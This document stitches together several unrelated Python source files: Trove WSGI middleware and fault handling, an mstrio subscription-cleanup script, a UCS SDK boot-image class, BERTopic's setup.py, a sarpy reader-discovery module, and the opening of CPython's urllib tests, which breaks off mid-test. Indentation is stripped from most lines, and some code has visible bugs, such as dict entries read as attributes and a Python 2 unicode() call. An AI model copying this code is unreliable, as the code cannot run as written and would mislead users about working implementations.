# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Wsgi helper utilities for trove"""
import math
import re
import time
import traceback
import uuid
import eventlet.wsgi
import jsonschema
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_service import service
import paste.urlmap
import webob
import webob.dec
import webob.exc
from trove.common import base_wsgi
from trove.common import cfg
from trove.common import context as rd_context
from trove.common import exception
from trove.common.i18n import _
from trove.common import pastedeploy
from trove.common import utils
CONTEXT_KEY = 'trove.context'
Router = base_wsgi.Router
Debug = base_wsgi.Debug
Middleware = base_wsgi.Middleware
JSONDictSerializer = base_wsgi.JSONDictSerializer
RequestDeserializer = base_wsgi.RequestDeserializer
CONF = cfg.CONF
# Raise the default from 8192 to accommodate large tokens
eventlet.wsgi.MAX_HEADER_LINE = CONF.max_header_line
eventlet.patcher.monkey_patch(all=False, socket=True)
LOG = logging.getLogger('trove.common.wsgi')
def versioned_urlmap(*args, **kwargs):
urlmap = paste.urlmap.urlmap_factory(*args, **kwargs)
return VersionedURLMap(urlmap)
def launch(app_name, port, paste_config_file, data={},
host='0.0.0.0', backlog=128, threads=1000, workers=None):
"""Launches a wsgi server based on the passed in paste_config_file.
Launch provides a easy way to create a paste app from the config
file and launch it via the service launcher. It takes care of
all of the plumbing. The only caveat is that the paste_config_file
must be a file that paste.deploy can find and handle. There is
a helper method in cfg.py that finds files.
Example:
conf_file = CONF.find_file(CONF.api_paste_config)
launcher = wsgi.launch('myapp', CONF.bind_port, conf_file)
launcher.wait()
"""
LOG.debug("Trove started on %s", host)
app = pastedeploy.paste_deploy_app(paste_config_file, app_name, data)
server = base_wsgi.Service(app, port, host=host,
backlog=backlog, threads=threads)
return service.launch(CONF, server, workers)
# Note: taken from Nova
def serializers(**serializers):
"""Attaches serializers to a method.
This decorator associates a dictionary of serializers with a
method. Note that the function attributes are directly
manipulated; the method is not wrapped.
"""
def decorator(func):
if not hasattr(func, 'wsgi_serializers'):
func.wsgi_serializers = {}
func.wsgi_serializers.update(serializers)
return func
return decorator
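# Hypothetical usage sketch (the serializer class name is an assumption, not
# part of Trove):
#
#     @serializers(json=MyCustomJSONSerializer)
#     def show(self, req, tenant_id, id):
#         ...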
class TroveMiddleware(Middleware):
# Note: taken from nova
@classmethod
def factory(cls, global_config, **local_config):
"""Used for paste app factories in paste.deploy config files.
Any local configuration (that is, values under the [filter:APPNAME]
section of the paste config) will be passed into the `__init__` method
as kwargs.
A hypothetical configuration would look like:
[filter:analytics]
redis_host = 127.0.0.1
paste.filter_factory = nova.api.analytics:Analytics.factory
which would result in a call to the `Analytics` class as
import nova.api.analytics
analytics.Analytics(app_from_paste, redis_host='127.0.0.1')
You could of course re-implement the `factory` method in subclasses,
but using the kwarg passing it shouldn't be necessary.
"""
def _factory(app):
return cls(app, **local_config)
return _factory
class VersionedURLMap(object):
def __init__(self, urlmap):
self.urlmap = urlmap
def __call__(self, environ, start_response):
req = Request(environ)
if req.url_version is None and req.accept_version is not None:
version = "/v" + req.accept_version
http_exc = webob.exc.HTTPNotAcceptable(_("version not supported"))
app = self.urlmap.get(version, Fault(http_exc))
else:
app = self.urlmap
return app(environ, start_response)
class Router(base_wsgi.Router):
# Original router did not allow for serialization of the 404 error.
# To fix this the _dispatch was modified to use Fault() objects.
@staticmethod
@webob.dec.wsgify
def _dispatch(req):
"""
Called by self._router after matching the incoming request to a route
and putting the information into req.environ. Either returns 404
or the routed WSGI app's response.
"""
match = req.environ['wsgiorg.routing_args'][1]
if not match:
return Fault(webob.exc.HTTPNotFound())
app = match['controller']
return app
class Request(base_wsgi.Request):
@property
def params(self):
return utils.stringify_keys(super(Request, self).params)
def best_match_content_type(self, supported_content_types=None):
"""Determine the most acceptable content-type.
Based on the query extension then the Accept header.
"""
parts = self.path.rsplit('.', 1)
if len(parts) > 1:
format = parts[1]
if format in ['json']:
return 'application/{0}'.format(parts[1])
ctypes = {
'application/vnd.openstack.trove+json': "application/json",
'application/json': "application/json",
}
bm = self.accept.best_match(ctypes.keys())
return ctypes.get(bm, 'application/json')
@utils.cached_property
def accept_version(self):
accept_header = self.headers.get('ACCEPT', "")
        accept_version_re = re.compile(r".*?application/vnd.openstack.trove"
                                       r"(\+.+?)?;"
                                       r"version=(?P<version_no>\d+\.?\d*)")
match = accept_version_re.search(accept_header)
return match.group("version_no") if match else None
@utils.cached_property
def url_version(self):
        versioned_url_re = re.compile(r"/v(?P<version_no>\d+\.?\d*)")
match = versioned_url_re.search(self.path)
return match.group("version_no") if match else None
class Result(object):
"""A result whose serialization is compatible with JSON."""
def __init__(self, data, status=200):
self._data = data
self.status = status
def data(self, serialization_type):
"""Return an appropriate serialized type for the body.
serialization_type is not used presently, but may be
in the future, so it stays.
"""
if hasattr(self._data, "data_for_json"):
return self._data.data_for_json()
return self._data
class Resource(base_wsgi.Resource):
def __init__(self, controller, deserializer, serializer,
exception_map=None):
exception_map = exception_map or {}
self.model_exception_map = self._invert_dict_list(exception_map)
super(Resource, self).__init__(controller, deserializer, serializer)
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, request):
return super(Resource, self).__call__(request)
def execute_action(self, action, request, **action_args):
if getattr(self.controller, action, None) is None:
return Fault(webob.exc.HTTPNotFound())
try:
self.controller.validate_request(action, action_args)
result = super(Resource, self).execute_action(
action,
request,
**action_args)
if type(result) is dict:
result = Result(result)
return result
except exception.TroveError as trove_error:
LOG.debug(traceback.format_exc())
LOG.debug("Caught Trove Error %s", trove_error)
httpError = self._get_http_error(trove_error)
LOG.debug("Mapped Error to %s", httpError)
return Fault(httpError(str(trove_error), request=request))
except webob.exc.HTTPError as http_error:
LOG.debug(traceback.format_exc())
return Fault(http_error)
except Exception as error:
exception_uuid = str(uuid.uuid4())
LOG.exception(exception_uuid + ": " + str(error))
return Fault(webob.exc.HTTPInternalServerError(
"Internal Server Error. Please keep this ID to help us "
"figure out what went wrong: (%s)." % exception_uuid,
request=request))
def _get_http_error(self, error):
return self.model_exception_map.get(type(error),
webob.exc.HTTPBadRequest)
def _invert_dict_list(self, exception_dict):
"""Flattens values of keys and inverts keys and values.
Example:
{'x': [1, 2, 3], 'y': [4, 5, 6]} converted to
{1: 'x', 2: 'x', 3: 'x', 4: 'y', 5: 'y', 6: 'y'}
"""
inverted_dict = {}
for key, value_list in exception_dict.items():
for value in value_list:
inverted_dict[value] = key
return inverted_dict
def serialize_response(self, action, action_result, accept):
# If an exception is raised here in the base class, it is swallowed,
# and the action_result is returned as-is. For us, that's bad news -
# we never want that to happen except in the case of webob types.
# So we override the behavior here so we can at least log it.
try:
return super(Resource, self).serialize_response(
action, action_result, accept)
except Exception:
# execute_action either returns the results or a Fault object.
# If action_result is not a Fault then there really was a
# serialization error which we log. Otherwise return the Fault.
if not isinstance(action_result, Fault):
LOG.exception(_("Unserializable result detected."))
raise
return action_result
class Controller(object):
"""Base controller that creates a Resource with default serializers."""
exception_map = {
webob.exc.HTTPUnprocessableEntity: [
exception.UnprocessableEntity,
],
webob.exc.HTTPUnauthorized: [
exception.Forbidden,
exception.SwiftAuthError,
],
webob.exc.HTTPForbidden: [
exception.ReplicaSourceDeleteForbidden,
exception.BackupTooLarge,
exception.ModuleAccessForbidden,
exception.ModuleAppliedToInstance,
],
webob.exc.HTTPBadRequest: [
exception.InvalidModelError,
exception.BadRequest,
exception.CannotResizeToSameSize,
exception.BadValue,
exception.DatabaseAlreadyExists,
exception.UserAlreadyExists,
exception.LocalStorageNotSpecified,
exception.ModuleAlreadyExists,
],
webob.exc.HTTPNotFound: [
exception.NotFound,
exception.ComputeInstanceNotFound,
exception.ModelNotFoundError,
exception.UserNotFound,
exception.DatabaseNotFound,
exception.QuotaResourceUnknown,
exception.BackupFileNotFound,
exception.ClusterNotFound,
exception.DatastoreNotFound,
exception.SwiftNotFound,
exception.ModuleTypeNotFound,
],
webob.exc.HTTPConflict: [
exception.BackupNotCompleteError,
exception.RestoreBackupIntegrityError,
],
webob.exc.HTTPRequestEntityTooLarge: [
exception.OverLimit,
exception.QuotaExceeded,
exception.VolumeQuotaExceeded,
],
webob.exc.HTTPServerError: [
exception.VolumeCreationFailure,
exception.UpdateGuestError,
],
webob.exc.HTTPNotImplemented: [
exception.VolumeNotSupported,
exception.LocalStorageNotSupported,
exception.DatastoreOperationNotSupported,
exception.ClusterInstanceOperationNotSupported,
exception.ClusterDatastoreNotSupported
],
}
schemas = {}
@classmethod
def get_schema(cls, action, body):
LOG.debug("Getting schema for %s:%s" %
(cls.__class__.__name__, action))
if cls.schemas:
matching_schema = cls.schemas.get(action, {})
if matching_schema:
LOG.debug(
"Found Schema: %s" % matching_schema.get("name",
matching_schema))
return matching_schema
@staticmethod
def format_validation_msg(errors):
# format path like object['field1'][i]['subfield2']
messages = []
for error in errors:
path = list(error.path)
f_path = "%s%s" % (path[0],
''.join(['[%r]' % i for i in path[1:]]))
messages.append("%s %s" % (f_path, error.message))
for suberror in sorted(error.context, key=lambda e: e.schema_path):
messages.append(suberror.message)
error_msg = "; ".join(messages)
return "Validation error: %s" % error_msg
def validate_request(self, action, action_args):
body = action_args.get('body', {})
schema = self.get_schema(action, body)
if schema:
validator = jsonschema.Draft4Validator(schema)
if not validator.is_valid(body):
errors = sorted(validator.iter_errors(body),
key=lambda e: e.path)
error_msg = self.format_validation_msg(errors)
LOG.info(error_msg)
raise exception.BadRequest(message=error_msg)
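    # Illustrative sketch (not part of Trove itself): a subclass can publish a
    # JSON schema per action name, and validate_request() above will check the
    # request body against it with jsonschema. The controller name and schema
    # below are hypothetical examples.
    #
    #   class ExampleController(Controller):
    #       schemas = {
    #           'create': {
    #               "name": "example:create",
    #               "type": "object",
    #               "required": ["thing"],
    #               "properties": {"thing": {"type": "object"}},
    #           },
    #       }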
def create_resource(self):
return Resource(
self,
RequestDeserializer(),
TroveResponseSerializer(),
self.exception_map)
def _extract_limits(self, params):
return {key: params[key] for key in params.keys()
if key in ["limit", "marker"]}
class TroveResponseSerializer(base_wsgi.ResponseSerializer):
def serialize_body(self, response, data, content_type, action):
"""Overrides body serialization in base_wsgi.ResponseSerializer.
If the "data" argument is the Result class, its data
method is called and *that* is passed to the superclass implementation
instead of the actual data.
"""
if isinstance(data, Result):
data = data.data(content_type)
super(TroveResponseSerializer, self).serialize_body(
response,
data,
content_type,
action)
def serialize_headers(self, response, data, action):
super(TroveResponseSerializer, self).serialize_headers(
response,
data,
action)
if isinstance(data, Result):
response.status = data.status
class Fault(webob.exc.HTTPException):
"""Error codes for API faults."""
code_wrapper = {
400: webob.exc.HTTPBadRequest,
401: webob.exc.HTTPUnauthorized,
403: webob.exc.HTTPUnauthorized,
404: webob.exc.HTTPNotFound,
}
resp_codes = [int(code) for code in code_wrapper.keys()]
def __init__(self, exception):
"""Create a Fault for the given webob.exc.exception."""
self.wrapped_exc = exception
@staticmethod
def _get_error_name(exc):
# Displays a Red Dwarf specific error name instead of a webob exc name.
named_exceptions = {
'HTTPBadRequest': 'badRequest',
'HTTPUnauthorized': 'unauthorized',
'HTTPForbidden': 'forbidden',
'HTTPNotFound': 'itemNotFound',
'HTTPMethodNotAllowed': 'badMethod',
'HTTPRequestEntityTooLarge': 'overLimit',
'HTTPUnsupportedMediaType': 'badMediaType',
'HTTPInternalServerError': 'instanceFault',
'HTTPNotImplemented': 'notImplemented',
'HTTPServiceUnavailable': 'serviceUnavailable',
}
name = exc.__class__.__name__
if name in named_exceptions:
return named_exceptions[name]
# If the exception isn't in our list, at least strip off the
# HTTP from the name, and then drop the case on the first letter.
name = name.split("HTTP").pop()
name = name[:1].lower() + name[1:]
return name
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Generate a WSGI response based on the exception passed to ctor."""
# Replace the body with fault details.
fault_name = Fault._get_error_name(self.wrapped_exc)
fault_data = {
fault_name: {
'code': self.wrapped_exc.status_int,
}
}
if self.wrapped_exc.detail:
fault_data[fault_name]['message'] = self.wrapped_exc.detail
else:
fault_data[fault_name]['message'] = self.wrapped_exc.explanation
content_type = req.best_match_content_type()
serializer = {
'application/json': base_wsgi.JSONDictSerializer(),
}[content_type]
self.wrapped_exc.body = serializer.serialize(fault_data, content_type)
self.wrapped_exc.content_type = content_type
return self.wrapped_exc
class ContextMiddleware(base_wsgi.Middleware):
def __init__(self, application):
self.admin_roles = CONF.admin_roles
super(ContextMiddleware, self).__init__(application)
def _extract_limits(self, params):
return {key: params[key] for key in params.keys()
if key in ["limit", "marker"]}
def process_request(self, request):
service_catalog = None
catalog_header = request.headers.get('X-Service-Catalog', None)
if catalog_header:
try:
service_catalog = jsonutils.loads(catalog_header)
except ValueError:
raise webob.exc.HTTPInternalServerError(
_('Invalid service catalog json.'))
tenant_id = request.headers.get('X-Tenant-Id', None)
auth_token = request.headers["X-Auth-Token"]
user_id = request.headers.get('X-User-ID', None)
roles = request.headers.get('X-Role', '').split(',')
is_admin = False
for role in roles:
if role.lower() in self.admin_roles:
is_admin = True
break
limits = self._extract_limits(request.params)
context = rd_context.TroveContext(auth_token=auth_token,
tenant=tenant_id,
user=user_id,
is_admin=is_admin,
limit=limits.get('limit'),
marker=limits.get('marker'),
service_catalog=service_catalog)
request.environ[CONTEXT_KEY] = context
@classmethod
def factory(cls, global_config, **local_config):
def _factory(app):
LOG.debug("Created context middleware with config: %s" %
local_config)
return cls(app)
return _factory
class FaultWrapper(base_wsgi.Middleware):
"""Calls down the middleware stack, making exceptions into faults."""
@webob.dec.wsgify(RequestClass=base_wsgi.Request)
def __call__(self, req):
try:
resp = req.get_response(self.application)
if resp.status_int in Fault.resp_codes:
for (header, value) in resp._headerlist:
if header == "Content-Type" and \
value == "text/plain; charset=UTF-8":
return Fault(Fault.code_wrapper[resp.status_int]())
return resp
return resp
except Exception as ex:
LOG.exception(_("Caught error: %s."), unicode(ex))
exc = webob.exc.HTTPInternalServerError()
return Fault(exc)
@classmethod
def factory(cls, global_config, **local_config):
def _factory(app):
return cls(app)
return _factory
# ported from Nova
class OverLimitFault(webob.exc.HTTPException):
"""
Rate-limited request response.
"""
def __init__(self, message, details, retry_time):
"""
Initialize new `OverLimitFault` with relevant information.
"""
hdrs = OverLimitFault._retry_after(retry_time)
self.wrapped_exc = webob.exc.HTTPRequestEntityTooLarge(headers=hdrs)
self.content = {"overLimit": {"code": self.wrapped_exc.status_int,
"message": message,
"details": details,
"retryAfter": hdrs['Retry-After'],
},
}
@staticmethod
def _retry_after(retry_time):
delay = int(math.ceil(retry_time - time.time()))
retry_after = delay if delay > 0 else 0
headers = {'Retry-After': '%d' % retry_after}
return headers
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, request):
"""
Return the wrapped exception with a serialized body conforming to our
error format.
"""
content_type = request.best_match_content_type()
serializer = {'application/json': JSONDictSerializer(),
}[content_type]
content = serializer.serialize(self.content)
self.wrapped_exc.body = content
self.wrapped_exc.content_type = content_type
return self.wrapped_exc
class ActionDispatcher(object):
"""Maps method name to local methods through action name."""
def dispatch(self, *args, **kwargs):
"""Find and call local method."""
action = kwargs.pop('action', 'default')
action_method = getattr(self, str(action), self.default)
return action_method(*args, **kwargs)
def default(self, data):
raise NotImplementedError()
class DictSerializer(ActionDispatcher):
"""Default request body serialization."""
def serialize(self, data, action='default'):
return self.dispatch(data, action=action)
def default(self, data):
return ""
class JSONDictSerializer(DictSerializer):
"""Default JSON request body serialization."""
def default(self, data):
return jsonutils.dumps(data)
|
the-stack_0_6582 | from mstrio.users_and_groups import list_users
from mstrio.api.projects import get_projects
from mstrio.distribution_services.subscription.subscription_manager import SubscriptionManager
from mstrio.connection import Connection
def delete_subscriptions_of_departed_users(connection: "Connection") -> None:
"""Delete all subscription in all projects which owners are departed users.
Args:
Args:
connection: MicroStrategy connection object returned by
`connection.Connection()`
"""
# get all projects that the authenticated user has access to
response = get_projects(connection, whitelist=[('ERR014', 403)])
prjcts = response.json() if response.ok else []
# get all disabled users
all_usrs = list_users(connection=connection)
dsbld_usrs = [u for u in all_usrs if not u.enabled]
for prjct in prjcts:
project_id = prjct['id']
sub_mngr = SubscriptionManager(connection=connection, project_id=project_id)
for usr in dsbld_usrs:
subs = sub_mngr.list_subscriptions(owner={'id': usr.id})
msg = f"subscriptions of user with ID: {usr.id}"
msg += f" in project {prjct.name} with ID: {prjct.id}"
# call of the function below returns True if all passed
# subscriptions were deleted
if sub_mngr.delete(subscriptions=subs, force=True):
print("All " + msg + " were deleted.")
else:
print("Not all " + msg + " were deleted or there was no subsscriptions.")
|
the-stack_0_6583 | """This module contains the general information for LsbootSanCatSanImage ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class LsbootSanCatSanImageConsts:
TYPE_PRIMARY = "primary"
TYPE_SECONDARY = "secondary"
class LsbootSanCatSanImage(ManagedObject):
"""This is LsbootSanCatSanImage class."""
consts = LsbootSanCatSanImageConsts()
naming_props = set([u'type'])
mo_meta = MoMeta("LsbootSanCatSanImage", "lsbootSanCatSanImage", "sanimg-[type]", VersionMeta.Version221b, "InputOutput", 0x7f, [], ["admin", "ls-compute", "ls-config", "ls-config-policy", "ls-server", "ls-server-policy", "ls-storage", "ls-storage-policy"], [u'lsbootSan'], [u'lsbootSanCatSanImagePath'], ["Add", "Get", "Remove", "Set"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version221b, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version221b, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version221b, MoPropertyMeta.READ_ONLY, 0x8, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version221b, MoPropertyMeta.READ_WRITE, 0x10, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"type": MoPropertyMeta("type", "type", "string", VersionMeta.Version221b, MoPropertyMeta.NAMING, 0x20, None, None, None, ["primary", "secondary"], []),
"vnic_name": MoPropertyMeta("vnic_name", "vnicName", "string", VersionMeta.Version221b, MoPropertyMeta.READ_WRITE, 0x40, None, None, r"""[\-\.:_a-zA-Z0-9]{0,16}""", [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"rn": "rn",
"sacl": "sacl",
"status": "status",
"type": "type",
"vnicName": "vnic_name",
}
def __init__(self, parent_mo_or_dn, type, **kwargs):
self._dirty_mask = 0
self.type = type
self.child_action = None
self.sacl = None
self.status = None
self.vnic_name = None
ManagedObject.__init__(self, "LsbootSanCatSanImage", parent_mo_or_dn, **kwargs)
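# Usage sketch (illustrative only; the UCSM host, credentials, boot-policy DN
# and vNIC name below are hypothetical):
#
#   from ucsmsdk.ucshandle import UcsHandle
#   handle = UcsHandle("ucsm-host", "admin", "password")
#   handle.login()
#   mo = LsbootSanCatSanImage(parent_mo_or_dn="org-root/boot-policy-bp1/san",
#                             type="primary", vnic_name="vnic0")
#   handle.add_mo(mo, modify_present=True)
#   handle.commit()
#   handle.logout()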
|
the-stack_0_6584 | import setuptools
test_packages = [
"pytest>=5.4.3",
"pytest-cov>=2.6.1"
]
docs_packages = [
"mkdocs==1.1",
"mkdocs-material==4.6.3",
"mkdocstrings==0.8.0",
]
dev_packages = docs_packages + test_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="bertopic",
packages=["bertopic"],
version="0.3.3",
author="Maarten Grootendorst",
author_email="[email protected]",
description="BERTopic performs topic Modeling with state-of-the-art transformer models.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/MaartenGr/BERTopic",
keywords="nlp bert topic modeling embeddings",
classifiers=[
"Programming Language :: Python",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: MIT License",
"Topic :: Scientific/Engineering",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Operating System :: Unix",
"Operating System :: MacOS",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.8",
],
install_requires=[
'torch',
'tqdm',
'numpy',
'umap-learn',
'hdbscan',
'pandas',
'scikit_learn',
'sentence_transformers',
'joblib',
'matplotlib'
],
extras_require={
"test": test_packages,
"docs": docs_packages,
"dev": dev_packages,
},
python_requires='>=3.6',
) |
the-stack_0_6585 | # -*- coding: utf-8 -*-
"""
This module provides utilities for attempting to open other image files not opened by
the sicd, sidd, or cphd reader collections.
"""
import os
import sys
import pkgutil
from importlib import import_module
from sarpy.io.general.base import BaseReader
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
###########
# Module variables
_openers = []
_parsed_openers = False
def register_opener(open_func):
"""
Provide a new opener.
Parameters
----------
open_func
This is required to be a function which takes a single argument (file name).
This function should return a sarpy.io.general.base.BaseReader instance
if the referenced file is viable for the underlying type, and None otherwise.
Returns
-------
None
"""
if not callable(open_func):
raise TypeError('open_func must be a callable')
if open_func not in _openers:
_openers.append(open_func)
def parse_openers():
"""
Automatically find the viable openers (i.e. :func:`is_a`) in the various modules.
Returns
-------
"""
global _parsed_openers
if _parsed_openers:
return
_parsed_openers = True
def check_module(mod_name):
# import the module
import_module(mod_name)
# fetch the module from the modules dict
module = sys.modules[mod_name]
# see if it has an is_a function, if so, register it
if hasattr(module, 'is_a'):
register_opener(module.is_a)
# walk down any subpackages
path, fil = os.path.split(module.__file__)
if not fil.startswith('__init__.py'):
# there are no subpackages
return
for sub_module in pkgutil.walk_packages([path, ]):
_, sub_module_name, _ = sub_module
sub_name = "{}.{}".format(mod_name, sub_module_name)
check_module(sub_name)
check_module('sarpy.io.other_image')
def open_other(file_name):
"""
Given a file, try to find and return the appropriate reader object.
Parameters
----------
file_name : str
Returns
-------
BaseReader
Raises
------
IOError
"""
if not os.path.exists(file_name):
raise IOError('File {} does not exist.'.format(file_name))
# parse openers, if not already done
parse_openers()
# see if we can find a reader though trial and error
for opener in _openers:
reader = opener(file_name)
if reader is not None:
return reader
    # If the for loop completes, no matching file format was found.
raise IOError('Unable to determine image format.')
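# Usage sketch (illustrative only): a caller can register its own opener and
# then let open_other() try it alongside the automatically discovered ones.
# The MyFormatReader class and the '.myext' extension are hypothetical.
#
#   def is_my_format(file_name):
#       if file_name.lower().endswith('.myext'):
#           return MyFormatReader(file_name)
#       return None
#
#   register_opener(is_my_format)
#   reader = open_other('/path/to/image.myext')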
|
the-stack_0_6592 | """Regresssion tests for urllib"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from test import support
import os
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
opener = urllib.request.FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(fakedata)
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = FakeHTTPConnection
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
        # getproxies_environment() uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
